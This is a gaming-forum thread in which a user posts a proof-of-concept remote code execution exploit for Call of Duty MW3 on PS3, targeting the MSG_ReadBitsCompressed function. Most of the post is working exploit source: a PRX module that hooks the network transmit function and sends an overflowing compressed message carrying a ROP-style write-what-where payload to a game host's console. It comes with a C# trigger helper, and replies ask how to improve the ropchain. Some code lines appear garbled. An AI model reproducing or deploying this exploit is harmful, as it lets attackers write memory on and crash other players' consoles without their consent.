Post: MW3 RCE POC
Options
12-30-2018, 10:24 PM
#1
Sabotage
Gaming Squad
Hi, it has come to my attention that some people are passing a version of this around. Those who are doing so have no clue what they are doing and did not make or find this themselves.
This code belongs 100% to me and nobody else has right to it.
This code belongs 100% to me and nobody else has right to it.
This is a remote code execution exploit found in code with in the function MSG_ReadBitsCompressed. This has been patched on xbox and pc but it stills present on mw2. While this is possible on mw2 it is very impractical and very prone to crashing.
Here is a video of what this can do:
Here I have included a download to the source of an sprx: You must login or register to view this content.
Here is some code on how to use it for Writing memory to the host of the game:
Here is some code on how to use it for Writing memory to the host of the game:
public void WriteUInt32(uint Address, uint Value)
{
PS3.Extension.WriteUInt32(0x10055010, Address);
PS3.Extension.WriteUInt32(0x10055014, Value);
PS3.Extension.WriteUInt32(0x10055000, 2);
while (PS3.Extension.ReadUInt32(0x10055000) != 0x0)
Thread.Sleep(10);
}
Also here is the code for those that don't feel like downloading the files:
#include <cellstatus.h>
#include <sys/prx.h>
#include <time.h>
#include <fastmath.h>
#include <ppu_intrinsics.h>
#include <stdarg.h>
#include <stddef.h>
#include <sys/prx.h>
#include <sys/syscall.h>
#include <sys/ppu_thread.h>
#include <sys/sys_time.h>
#include <sys/time_util.h>
#include <sys/timer.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet\in.h>
#include <arpa\inet.h>
#include <netdb.h>
#include <cell\pad\libpad.h>
#include <sys/process.h>
#include <sys/memory.h>
SYS_MODULE_INFO( MW3_RCE, 0, 1, 1);
SYS_MODULE_START( _MW3_RCE_prx_entry );
SYS_MODULE_STOP(_MW3_RCE_prx_stop);
/*
Credits:
Gamer7112 for bring my attention to this
momo5502 for originally making a post showing this off.
Sabotage finding the exploit and creating the poc
*/
int RestoreHook[4];
extern "C" {
void *_sys_memset(void * ptr, void* value, size_t num);
}
#define memset _sys_memset
struct msg_t
{
int overflowed;
int readOnly;
char* data;
char* splitData;
int maxsize;
int cursize;
int splitSize;
int readcount;
int bit;
int lastEntityRef;
int targetLocalNetID;
int useZlib;
};
#define TOC 0x72DCE8
struct opd_s_o
{
unsigned int sub;
unsigned int toc;
};
opd_s_o MSG_WriteBitsCompress_t = { 0x001FBFC8, TOC };
int(*MSG_WriteBitsCompress)(bool trainHuffman, const char *from, char *to, int size) = (int(*)(bool trainHuffman, const char *from, char *to, int size))&MSG_WriteBitsCompress_t;
opd_s_o MSG_Init_t = { 0x001FBC78, TOC };
int(*MSG_Init)(msg_t* msg, char* buffer, int size) = (int(*)(msg_t* msg, char* buffer, int size))&MSG_Init_t;
opd_s_o MSG_WriteData_t = { 0x001FC128, TOC };
int(*MSG_WriteData)(msg_t* msg, unsigned char* data, int size) = (int(*)(msg_t* msg, unsigned char* data, int size))&MSG_WriteData_t;
int CL_Netchan_TransmitStub(...)
{
__asm("li %r3, 0x332;");
}
int CL_Netchan_Transmit(int netchan, unsigned char* buffer, int size, int unk)
{
if (*(int*)0x10055000 == 2)
{
msg_t message;
memset(&message, 0, sizeof(msg_t));
char MessageBuffer[0x1000];
char DataToBeSent[0x1000];
memset(MessageBuffer, 0, 0x1000);
memset(DataToBeSent, 0, 0x1000);
MSG_Init(&message, MessageBuffer, 0x1000);
MSG_WriteData(&message, buffer, 0x9);
memset(DataToBeSent, 0, 0x840 + 0x9C);
int* a = (int*)&
ataToBeSent[0x808];
a[1] = *(int*)(0x10055014); //value
a[3] = *(int*)(0x10055010); //address
int* r = (int*)&ataToBeSent[0x820];
r[3] = 0xCAD8C;
r[35] = 0x1F6E58;
r[36] = 0xAAAAAAAA;
MSG_WriteData(&message, (unsigned char*)DataToBeSent, 0x840 + 0x9C);
int CompressedSize = MSG_WriteBitsCompress(0, &message.data[0x9], &message.data[0x9], message.cursize - 0x9);
*(int*)0x10055000 = 0;
return CL_Netchan_TransmitStub(netchan, (unsigned char*)message.data, CompressedSize, unk);
}
return CL_Netchan_TransmitStub(netchan, buffer, size, unk);
}
int sys_dbg_read_process_memory(uint64_t address, void* data, size_t size) {
system_call_4(904, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
return_to_user_prog(int);
}
int sys_dbg_write_process_memory(uint64_t address, void* data, size_t size) {
system_call_4(905, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
__dcbst((void*)address);
__sync();
__isync();
return_to_user_prog(int32_t);
}
void DetourFunction(int address, void(*hookFunc), void(*stubFunc)) {
int StubData[8], FuncData[4];
int hook_address = hookFunc != NULL ? *(int*)hookFunc : 0;
int stub_address = stubFunc != NULL ? *(int*)stubFunc : 0;
if (stub_address) {
int branchAddr = address + 0x10;
StubData[0] = 0x3D600000 + ((branchAddr >> 16) & 0xFFFF) + (branchAddr & 0x8000 ? 1 : 0);
StubData[1] = 0x396B0000 + (branchAddr & 0xFFFF);
StubData[2] = 0x7D6903A6;
StubData[7] = 0x4E800420;
sys_dbg_read_process_memory(address, &StubData[3], 0x10);
sys_dbg_write_process_memory(stub_address, StubData, 0x20);
}
if (hook_address) {
FuncData[0] = 0x3D600000 + ((hook_address >> 16) & 0xFFFF) + (hook_address & 0x8000 ? 1 : 0);
FuncData[1] = 0x396B0000 + (hook_address & 0xFFFF);
FuncData[2] = 0x7D6903A6;
FuncData[3] = 0x4E800420;
sys_dbg_write_process_memory(address, FuncData, 0x10);
}
}
extern "C" int _MW3_RCE_prx_entry(void)
{
sys_dbg_write_process_memory((uint64_t)RestoreHook, (void*)0xDE810, 0x10);
DetourFunction(0xDE810, CL_Netchan_Transmit, CL_Netchan_TransmitStub);
return SYS_PRX_RESIDENT;
}
extern "C" int _MW3_RCE_prx_stop(void)
{
sys_dbg_write_process_memory((uint64_t)0xDE810, (void*)RestoreHook, 0x10);
return SYS_PRX_RESIDENT;
}
Credits
Gamer7112 for bring my attention to this
momo5502 for originally making a post showing this off.
xbox360lsbest for the video
Sabotage finding the exploit and creating the poc
Note: There is a bug with this implementation that causes it to only be able to be used a couple of times before crashing the host's console.
Last edited by
Sabotage ; 01-01-2019 at 05:43 PM.
12-31-2018, 02:13 AM
#4
Sabotage
Gaming Squad
Originally posted by Ssxbox
Originally posted by Sabotage
Thank you very much
What was left of the game you have just broken it 10 times more asshole
I agree, hopefully they patch it lol.
The following user thanked Sabotage for this useful post:
03-01-2019, 04:16 AM
#8
blasts
Haxor!
Originally posted by Sabotage
Originally posted by tobi59320
Originally posted by Sabotage
Could you add all type compatibility(bool, byte, sbyte, short, ushort, int, uint, float, decimal, double, long, ulong...).
can't, you can write the ropchain tho. Its pretty easy.
The real question is, does this come with jiggy menu?
12-16-2020, 11:47 PM
#9
tobi59320
Grunt
Hey, I am trying to fix it so I have already restored the stack via setjmp / longjmp but the risk of freezing I would like to know if it is possible to help me improve the whole ropchain?
Contact me on discord: Igris#2121
Contact me on discord: Igris#2121
Last edited by
tobi59320 ; 12-16-2020 at 11:50 PM.
Copyright © 2024, NextGenUpdate.
All Rights Reserved.
